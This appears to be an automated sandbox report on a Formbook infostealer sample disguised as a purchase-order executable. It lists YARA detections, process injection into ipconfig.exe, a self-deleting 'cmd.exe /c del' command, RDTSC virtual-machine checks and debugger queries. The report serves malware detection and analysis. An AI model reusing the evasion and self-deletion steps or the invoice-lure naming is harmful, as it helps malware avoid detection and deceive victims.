          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8F900
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01052B28
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104DBD2
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010403DA
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0103FA2B
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBEBB0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010522AE
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAAB40
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01052D07
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01051D55
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010525DD
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9841F
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9D5E0
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104D466
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB2581
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F80D20
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FA6E30
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0105DFCE
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01051FF1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104D616
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01052EF7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F422AE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F2FA2B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3DBD2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F303DA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAEBB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9AB40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F42B28
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F428EC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F420A8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8B090
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F4E824
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F31002
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E94120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7F900
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F42EF7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E96E30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3D616
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F41FF1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F4DFCE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3D466
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8841F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8D5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F425DD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F41D55
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E70D20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F42D07
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B08A3B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B08A40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1C16E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B02FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1BF03
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B02D90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B02D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02B1C52F
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: String function: 013E0550 appears 47 times
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: String function: 013EDBFD appears 32 times
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: String function: 013DB9F5 appears 624 times
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: String function: 00F8B150 appears 54 times
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: String function: 02E7B150 appears 48 times
          Source: Purchase Order 40,7045$.exe, 00000000.00000003.237695476.000000000332F000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order 40,7045$.exe
          Source: Purchase Order 40,7045$.exe, 00000001.00000002.273903845.0000000000F27000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameipconfig.exej% vs Purchase Order 40,7045$.exe
          Source: Purchase Order 40,7045$.exe, 00000001.00000002.274263371.000000000120F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order 40,7045$.exe
          Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/0@17/13
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_01
          Source: Purchase Order 40,7045$.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: Purchase Order 40,7045$.exe | Virustotal: Detection: 43%
          Source: Purchase Order 40,7045$.exe | ReversingLabs: Detection: 36%
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | File read: C:\Users\user\Desktop\Purchase Order 40,7045$.exe
          Source: unknown | Process created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
          Source: unknown | Process created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe C:\Users\user\Desktop\Purchase Order 40,7045$.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Process created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe C:\Users\user\Desktop\Purchase Order 40,7045$.exe
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
          Source: Purchase Order 40,7045$.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: Purchase Order 40,7045$.exe, 00000001.00000002.273754242.0000000000B29000.00000004.00000020.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: Purchase Order 40,7045$.exe, 00000001.00000002.273754242.0000000000B29000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: Purchase Order 40,7045$.exe, 00000000.00000003.240059107.0000000003210000.00000004.00000001.sdmp, Purchase Order 40,7045$.exe, 00000001.00000002.274071356.000000000107F000.00000040.00000001.sdmp, ipconfig.exe, 00000005.00000002.504287883.0000000002F6F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Purchase Order 40,7045$.exe, ipconfig.exe
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_013D7FB0 LoadLibraryA,GetProcAddress,RpcMgmtEpEltInqBegin,VirtualProtect,EnumTimeFormatsA,__wsystem,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_013E0595 push ecx; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 0_2_013DD44F push ecx; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00415913 push edx; retf
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0041AC62 push D8D19732h; iretd
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00414D57 push esi; retf
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0041AD65 push eax; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00414DEA push eax; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0041ADB2 push eax; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0041ADBB push eax; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00414E7E push eax; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0041AE1C push eax; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00414E24 push eax; ret
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_0040FF92 push 00000033h; iretd
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_00FDD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02ECD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B15913 push edx; retf
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B14E24 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B1AE1C push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B14E7E push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B0FF92 push 00000033h; iretd
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B1AC62 push D8D19732h; iretd
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B1ADB2 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B1ADBB push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B14DEA push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B1AD65 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 5_2_02B14D57 push esi; retf

          Persistence and Installation Behavior:

          Uses ipconfig to lookup or modify the Windows network settings
          Source: unknown | Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | RDTSC instruction interceptor: First address: 00000000004083D4 second address: 00000000004083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | RDTSC instruction interceptor: First address: 000000000040876E second address: 0000000000408774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exe | RDTSC instruction interceptor: First address: 0000000002B083D4 second address: 0000000002B083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exe | RDTSC instruction interceptor: First address: 0000000002B0876E second address: 0000000002B08774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe | Code function: 1_2_004086A0 rdtsc
          Source: C:\Windows\explorer.exe TID: 5636 | Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6160 | Thread sleep time: -48000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exe | Last function: Thread delayed
          Source: explorer.exe, 00000002.00000000.258328544.0000000008A32000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.258328544.0000000008A32000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 00000002.00000000.251236949.00000000048E0000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.259375031.0000000008C73000.00000004.00000001.sdmp | Binary or memory string: _VMware_SATA_CD00#5&
          Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 00000002.00000000.258818986.0000000008B88000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 00000002.00000000.258557851.0000000008ACF000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000002.00000000.254456910.00000000069DA000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD002
          Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.259579486.0000000008D97000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}October%%
          Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_004086A0 rdtsc
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00409900 LdrLoadDll,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E032D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013D7FB0 LoadLibraryA,GetProcAddress,RpcMgmtEpEltInqBegin,VirtualProtect,EnumTimeFormatsA,__wsystem,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013FD014 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013FD051 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013FD0B4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013FC520 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F858EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC90AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010069A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010051BE mov eax, dword ptr fs:[00000030h]
